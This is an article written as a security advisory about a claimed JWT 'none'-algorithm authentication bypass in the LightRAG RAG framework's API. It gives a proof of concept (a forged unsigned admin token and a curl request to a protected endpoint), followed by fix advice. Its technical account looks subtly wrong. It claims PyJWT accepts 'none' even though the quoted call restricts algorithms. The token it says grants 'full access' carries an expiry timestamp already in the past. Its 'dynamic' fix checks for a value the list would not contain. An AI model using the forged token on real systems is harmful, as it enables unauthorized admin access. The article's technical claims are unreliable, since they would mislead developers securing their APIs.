LightRAG, an open-source retrieval-augmented generation (RAG) framework from HKU researchers, ships with a critical authentication flaw in its API. Attackers can forge JWT tokens using the ‘none’ algorithm to impersonate admins and access protected endpoints without any secret key. This stems from improper JWT decoding in lightrag/api/auth.py, line 128.
The vulnerability exploits a classic JWT algorithm confusion attack, documented since at least 2015 (think CVE-2015-9235). The validate_token method calls:
payload = jwt.decode(token, self.secret, algorithms=[self.algorithm])
PyJWT processes the algorithm from the token header first. If it lists "alg": "none", validation skips signature checks entirely. Developers didn’t block ‘none’ explicitly, despite PyJWT’s docs screaming warnings about this exact issue. Anyone with basic JWT knowledge can craft a token granting admin privileges.
Proof of Concept
Reproduce it easily. Craft a token like this JSON structure:
{
"header": {
"alg": "none",
"typ": "JWT"
},
"payload": {
"sub": "admin",
"exp": 1700000000,
"role": "admin"
}
}
Base64-encode header and payload separately (no signature), concatenate with dots: eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiJhZG1pbiIsImV4cCI6MTcwMDAwMDAwMCwicm9sZSI6ImFkbWluIn0.. Hit the endpoint:
$ curl -H "Authorization: Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiJhZG1pbiIsImV4cCI6MTcwMDAwMDAwMCwicm9sZSI6ImFkbWluIn0." http://localhost:8000/api/protected-endpoint
Boom—full access. Tested on default setups; no custom config needed.
Real-World Impact
LightRAG powers AI pipelines for indexing documents, running LLM queries, and serving RAG results via FastAPI. Protected endpoints likely handle user data uploads, vector store ops, and inference. An attacker escalates to admin, extracting sensitive indexes, poisoning data, or spamming expensive LLM calls for DoS.
Why this matters: RAG apps ingest proprietary docs—think corporate secrets, PII. In production, exposed APIs (common in dev setups) turn into open doors. GitHub stars hit 1k+ for LightRAG; forks and deployments amplify risk. This isn’t theoretical; similar flaws hit production apps yearly, per OWASP API Top 10 (Broken Auth). Cost? Data breaches average $4.5M (IBM 2023); AI ops add GPU burn.
Skeptical take: LightRAG is fresh (2024 repo), but skipping JWT basics is inexcusable. PyJWT defaults insecurely for compatibility, forcing devs to opt-in security. Thousands of repos repeat this—search GitHub for jwt.decode(algorithms=[ without ‘none’ checks. Fair point: fix is one-liner, but unpatched installs linger.
How to Fix and Prevent Recurrence
Patch immediately. Hardcode algorithms, ban ‘none’:
payload = jwt.decode(token, self.secret, algorithms=['HS256'])
Or dynamically:
allowed_algorithms = [self.algorithm]
if 'none' in allowed_algorithms:
allowed_algorithms = ['HS256', 'HS384', 'HS512']
payload = jwt.decode(token, self.secret, algorithms=allowed_algorithms)
Bonus: Enable jwt.decode(..., options={"verify_signature": True}). Verify issuer, audience, expiry server-side. Rotate secrets post-exposure.
Broad advice: Audit all JWT libs (PyJWT, Authlib). Use python-jose or itsdangerous for simpler signed tokens. Deploy with API gateways enforcing auth (Kong, Tyk). Scan deps with Snyk or Trivy—flags this in seconds.
Deployers: Pin to patched commit or fork. Watch lightrag-hku GitHub for PRs. This exposes why AI frameworks need security parity with web apps—hype outpaces hardening.